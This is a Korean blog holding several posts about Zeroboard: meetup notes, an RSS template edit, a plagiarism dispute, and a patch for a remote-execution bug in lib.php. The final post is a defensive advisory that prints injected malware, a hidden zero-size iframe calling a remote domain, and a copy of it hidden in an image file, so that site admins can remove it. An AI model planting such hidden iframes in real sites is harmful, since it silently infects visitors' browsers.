Parker Falcon :: Grooving on the paper

게시물보다 댓글이 더 위험한건 아닌가 걱정됩니다...

이제 곧 2부 모임을 위해서 한승엽님께서 준비중이십니다. - 15:26

여기 저기서 MacBook의 부팅 소리가 나네요 ^^;

MBP도 보이네요.

이제 시작합니다.

제로보드에 구성에 대해서 발표를 하십니다.

zb4와의 비교

기능을 분할했다는 차이
interface로 db에 접근
그러므로 유연해졌다.

새로 생긴 기능?

module, widget, addon, query XML, trigger, template??

설명하고 계십니다.

이제 막 모임을 시작했습니다.

고영수님께서 발표하시네요 :)

Zeroboard의 역사(?)에 대해서 이야기하고 계십니다 - 14:28:50

괜찮은 스킨들이 올해 하반기쯤 나올것으로 추측? - 14:38

블로그 기능도 추가될거랍니다. - 14:41

몇 가지 이야기 더 해주시고 발표 마치셨습니다. - 14:49

상품이 있으니까 질문을 바로 해주시네요 ^^ - 14:50
- 블로그 상태에서 검색이 잘 안된다.
- 리스팅에 문제가 있다(?)
라는 질문을 해주셨습니다.
그리고 NaverCam을 받으셨네요.
20개나 준비되었다고 하십니다.

답변 - 블로그는 제작에 잘 못했다.
이제 열심히 버닝하겠다. 의견을 통해서 참여해주면 좋겠다.

백성찬님 질문 -
1. mobileXE에서 읽기만 되고 쓰기는 안된다.
답글도 못단다. 언제쯤 지원할 예정인가?

2. 예전부터 기대하는 쇼핑몰 모듈은 어떻게 되는가?

제로님 답변 -
일단 선물 드리고 +_+

모바일 같은경우는 기대를 많이하셨는데,
처음애 모바일에 대한 지식을 얻었을 때 WAP밖에 없었는데,
아직은 시험버전이고, 사이트를 실질적으로 활용하기보다는, 잘 돌아가는가에 대해서
알아보기 위해서 개발한 것이다.
아직 지식이 부족하고, 찾아서 개발하면 되기는 하는데 전문 분야는 아니므로 오래 걸릴 예정이다.
누군가가 선듯 나와서 도와주시면 좋겠다.
일본에서 핸드폰으로 보는데 댓글도 볼 수 없어서 답답했다.
누군가가 같이 개발해주시는게 어떤가?
그리고 요즘에는 풀 브라우징이 대세로 올라오면서 방법이 바뀔지도 모르겠다(?)
나도 full browsing mobile device가 없는데, 누군가가 같이 해주면 빨리 될 것 같다.

쇼핑몰은 아직 할 여력이 안된다.
쇼핑몰 자체는 큰 문제가 아니지만, 결제시스템이 고민이다.
올해안에는 만들어야 된다 ㅠㅠ

질문 - 예전에 오픈소스(?)처럼 개발한 쇼핑몰들이 다른 회사에서 가져가버려서 문제가 생겼다.
어떻게 해결하는가?

답변 - zb4같은경우 재배포를 금지했다. 이유는 코드를 변경해서 문제가 생길수 있으니까.
그 회사가 라이센스를 지키지 않은것(그런가??)이다.
대안은 소스를 공개하지 않는것. 문제는 발전은 없다.
오픈소스를 사용하면, 권리를 나누어서 사용하는 경우인데,

브렌치도 환영한다. 외국에는 그런경우가 많다.

원하지 않는 다른 곳에서 사용하는 부분에 대해서 아직은 제제애 대해서는 없다(?)

(몇 가지 놓쳤네요;;)

토깽이님 질문 -
업데이트 할 때 버전을 건너띄면 제대로 작동하지 않는다.

제로님 답변 -
소스코드 / 디비가 있는데
소스코드를 올릴 때 누락되는경우가 있고
디비가 변하지 않아서 문제가 있다.

tools기능을 이용하면 source문제는 할 수 있고,
모듈들의 업데이트 기능이 있는데,
이런 기능들이 자동적으로 되어야 되다고 생각한다.
버전이 달라지면 다시 확인하는 기능을 추가한다.

업데이트 할 때 사이트를 잠시 멈추게 하는 것에 대한 이야기도 있음.

제일 좋은건 subversion을 사용하는것.

가가멜님(?) -

검색은 나중에 마케터와 광고를 차단하는것만 해결하는게 더욱 좋아질것이다.
zbxe는 호환성이 좋은편이다.
특히 게시판 검색같은 경우에 full-text로 하면 더욱 빨리진다거나
하는 성능 향상으로 올라갈수 있는 부분들이 core에 들어갈 수 있다.
이 부분에 대해서는 어떻게 생각하는가?

답변 -
일단 검색은 abusing이다. 전문회사도 있다. nhn같은경우는 ?
관심이 많고 잘 쓰고 싶은데, abusing은 검색회사에서 할 일이라고 본다. zbxe차원에서 차단할 문제는 아니라고 본다.
그 contents를 걸러내는것은 회사의 몫이다.
(질문의 의도는 liveXE에 관한 이야기라고 생각하는데요...;;)

호환성을 보장하려고 하는데,
예를 들어서 mysql에서 더 효율적으로 할 수 있는데, 아직 core에는 없다.
각 db에 특화된 부분을 당장에 사용할수는 없을것 같다.
아직 능력이 부족해서 적용하기는 어렵지 않을까.

1부 종류 후 휴식시간입니다 :)

./modules/rss/tpl 에 rss20.html 을 아래와 같이 바꿉니다.
(1.0.4 기준)

다만 작동 여부는 장담 못해요.

{'<?xml version="1.0" encoding="utf-8"  standalone="yes"?>'}

<rss version="2.0" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:taxo="http://purl.org/rss/1.0/modules/taxonomy/" xmlns:media="http://search.yahoo.com/mrss" xmlns:atom="http://www.w3.org/2005/Atom">
    <channel>
        <title><![CDATA[{$info->title}]]></title>
        <link><![CDATA[{$info->link}]]></link>
        <description><![CDATA[{$info->description}]]></description>
        <language>{$info->language}</language>
        <pubDate>{$info->date}</pubDate>
        <totalCount>{$info->total_count}</totalCount>
        <!--@foreach($document_list as $oDocument)-->
        <!--@foreach($oDocument->getUploadedFiles() as $key => $UploadedFiles)-->
        <item>
            <title><![CDATA[{$oDocument->getTitleText()}]]></title>
            <author><![CDATA[{$oDocument->getNickName()}]]></author>
            <link><![CDATA[{$oDocument->getPermanentUrl()}]]></link>
            <!--@if($oDocument->thumbnailExists())-->
            <media:thumbnail url="{$UploadedFiles->download_url}"/>
            <media:content url="{$UploadedFiles->download_url}"/>
            <!--@end-->
            <!--@if($mid_list[$oDocument->get('module_srl')]->open_rss=='Y')-->
            <description><![CDATA[{$oDocument->getContent(false,false,true)}]]></description>
            <!--@else-->
            <description><![CDATA[{$oDocument->getContentText(100)}]]></description>
            <!--@end-->
            <pubDate>{$oDocument->getRegdateGM()}</pubDate>
            <!--@foreach($oDocument->get('tag_list') as $tag)-->
            <category><![CDATA[{$tag}]]></category>
            <!--@end-->
        </item>
        <!--@end-->
        <!--@end-->
    </channel>
</rss>

인터넷에서 뉴스를 잠시 보다가 기대작 ‘제로보드XE 1.0’ 1년만에 정식출시라는 기사를 보게 되었다.

(링크는 해당 신문사로 바로 연결해 두었지만, 실제로는 네이버상에서 기사를 읽었다.)

개인적으로 관심을 가지고 있던 (좋아하고, 좋아하지 않고와는 다른 문제로) 제로보드XE의

정식 출시라는 소식을 접해 듣고 기사를 읽었다. 그리고 밑에 간단한 답글과 트랙백이 달려있는 것을 확인했다.

흥미로운 트랙백(서명덕기자는 기사를 이런식으로 쓰나?)이 있어서 들어가서 읽어 보았다.

내용을 대충 요약하자면 이런 것이다.
(내가 피곤한 늦은 밤에 쓴 글이기 때문에, 사실을 왜곡 할 가능성이 있으니 정확한 사실을 알고 싶은 사람은 두 사람의 글을 읽고 직접 비교하기 바랍니다.)

1. [서명덕 기자]님 께서 [댣로그] 블로그에서 [제로보드XE 정식버젼 출시]라는 게시물을 읽었다.
2. [서명덕 기자]님 께서 [조선일보]에 [기대작 ‘제로보드XE 1.0’ 1년만에 정식출시]라는 기사를 올렸다.
3. [댣로그 관리자]님 께서 [서명덕 기자]님 께서 작성하신 기사를 읽었다.
4. [댣로그 관리자]님 께서 자신이 쓴 글과 신문 기사를 비교해 보면서 많은 유사점을 발견했다.
5. [댣로그 관리자]님 께서 [서명덕 기자의 제로보드 정식출시] 기사는 [자신의 게시물]을 [복사해놓고 단어나 표현만 바꿔놓은것이나 다름없]다고 생각하면서 [서명덕 기자의 기사에 대한 문제 제기] 게시물을 올렸다.
6. [서명덕 기자]님 께서 [댣로그] 블로그에 가서 [몇 줄은 그대로 쓴 것이 맞고 나머지는 직접 참고한 것은 아니다] 정도의 해명으로 [댓글]을 작성했다.

이 정도가 아닌가 생각합니다.

그리고 그 이후의 경과는 제가 생각하기에는 [댣로그 관리자]님 께서는 [서명덕 기자]님의 해명에 만족 하지 못하고 더 강도 높은 사과를 원하지만 그렇게 되지 않은 것으로 보입니다.

제 생각은 이러합니다.

세상에 글의 종류는 다양합니다만, 객관적 사실에 중요성을 둔 글(예를 들면 과학적 실험 결과의 보고서)이 있고 주관적 의견에 중점을 둔 글(사설, 논평 등)이 있습니다. 만약 지금 이야기 하고자 하는 "글이 매우 유사 하다"라는 문제가 뒤의 글, 즉 주관적인 의견이 중요한 글에서 일어났다면 표절과 같은 논란의 대상이 되는것은 쉽게 생각할 수 있습니다. 하지만 객관적인 사실에 관한 글이라면 조금 다르다고 생각합니다.

경우에 따라서는 약간 달라질 수도 있겟지만, 보통의 경우는 큰 특징에 대해서는 일치합니다. 예를 들어서 DMB와 음악 재생 기능이 있는 예쁜 카메라가 출시 되었을 때, 제품에 대한 설명에는 DMB로 TV를 볼 수 있고, 음악 파일을 넣어서 들을 수 있으며, 디자인이 예쁘다는 이야기가 들어가 있을 것 입니다. 설명 부분은 여러 사람이 쓰더라도 큰 차이는 없을 것 입니다. 물론 특정 분야의 전문가라면 거기에 있는 DMB의 칩에 관한 이야기나 안테나의 전자기학적 구조에 대한 이야기를 쓸 수도 있지만, 많은 사람들에게 제품을 설명 하는 글에 쓸 내용과는 거리가 있습니다.

지금 경우는 좀 전에 설명한 경우와 비슷하다고 보니다. 둘 다 제로보드XE의 1.0출시라는 사실을 두고 이러이러한 일을 할 수 있는 이런 기능과 저런 기능이 있다는 글을 썼습니다. 사실을 쓴 부분에서는 큰 내용은 대부분 일치 합니다. 더군다나 중요한 단어들(RSS나 모듈화 같은)은 겹치지 않기가 힙듭니다. 물론 그러한 내용을 쓰는 부분에서 [댣로그 관리자]님 께서 첫번째로 지적하신 부분은 [서명덕 기자]님 께서 인정하셨으니 더이상 이야기 하지는 않겠습니다. 하지만 그 이외의 부분들( #2 #3 #4 )에 대해서는 [서명덕 기자]님 께서 보고 'copy'했다는 것 보다는 같은 사실을 보고 특징을 같이 본 것이라고 생각합니다. '1년' 이라는 표현 등 다른 겹치는 부분도 애초에 처음 글인 [제로보드의 공지사항]에서 시작된 것이 봅니다.

아무튼 블로그가 인터넷 상에서 자신의 생각등을 남기는 것이고, 생각은 자유롭게 할 수 있지만 불화나 오해가 생기지 않았으면 좋겠습니다.

결국 패치가 나왔습니다.

우선 문제는 lib.php파일에 있었나봅니다.

제로보드4 원격실행 취약 버그 패치해주세요. 제로보드 4.1 pl8 - 2007. 11. 1일 보안 버그까지 적용

수동 해결 방안도 함께 이렇게 제시하고 있습니다.

1. lib.php 파일을 에디터 등으로 연다
2. $REMOTE_ADDR 이라는 글자를 모두 $_SERVER['REMOTE_ADDR'] 로 변경
3. 이 때 global $HTTP_SESSION_VARS, $member_table, $REMOTE_ADDR, $member, $connect; 이라는 부분에서는
   global $HTTP_SESSION_VARS, $member_table, $member, $connect; 로 변경을 한다.

하지만 편집 프로그램의 찾아 바꾸기 기능으로 마구 바꾸시면 곤란하구요.

혹시 php의 문법을 (아니라 C의 문법이라도 ) 아시는 분이시라면

lib.php에서 REMOTE_ADDR을 찾아보면


두종류가 있습니다.

하나는 선언 부분인데

global $HTTP_SESSION_VARS, $member_table, $REMOTE_ADDR, $member, $connect;

global $HTTP_SESSION_VARS, $member_table, $member, $connect;

이렇게 선언문, 그러니까 앞에 global이 있는 문장에서는

$REMOTE_ADDR 은 삭제하시고,

$zb_logged_ip=$REMOTE_ADDR;

$zb_logged_ip=$_SERVER['REMOTE_ADDR'];

이렇게 실제로 쓰이는 부분에서는, 그러니까 앞에 global이 없을 때는

$REMOTE_ADDR 을 $_SERVER['REMOTE_ADDR']로 바꾸시면 됩니다.

요즘 제로보드4에 대한 중국발 해킹이 늘어나면서
많은 홈페이지가 감염되고, 또한 사용자들도 감염되고 있습니다.


당장의 대책이라면 _head.php에

<iframe width='0' height='0' src='http://d[.]xin8[.]info/daipi/css.htm'></iframe>
이것을 제거하시구요.
그리고 images폴더 아래에 admin_info.gif파일이 있는데
이것도 제거하십시요.
파일 내용은
images/admin_info.gif

document.write("<iframe width='0' height='0' src='http://d[.]xin8[.]info/daipi/css.htm'></iframe>");

이러합니다.


그리고 이런 작업은 홈페이지 관리자만 할 수 있습니다.

관리자가 할 수 있는 것은 제로보드의 최신 패치를 업데이트 하는 것 입니다.

제가 본 사이트 대부분이 2006년 3월 15일자 패치만을 해 둔 상태인데

http://www.zeroboard.com/zb4_download/803874

로 가셔서 2007년 5월 23일짜 보안 패치까지 된 pl8버전을 받으시기 바랍니다.
제로보드에서 업데이트 중에 pl의 숫자를 올리지 않아서
많은 사람들이 업데이트가 없다고 생각한 것인지는 모르겠지만
아무튼 많은 분들께서 더이상의 업데이트를 하지 않으셨습니다.

그리고 일반 사용자분들 께서 하실 수 있는 일은

인터넷 익스플로어를 사용하신다면

도구 - 인터넷 옵션 - 보안 으로 가셔서

제한된 사이트 클릭하시고 목록에 *.xin8.info 를 입력하고 추가하시기 바랍니다.

다른 브라우져 (Firefox, Opera, Safari)를 사용 하시는 분들은 상관 없지만

인터넷 익스플로어 엔진을 사용하는 브라우져를 사용하시는 분들은 똑같이 추가하시기 바랍니다.

아무튼 다들 피해 없으시기 바랍니다 :)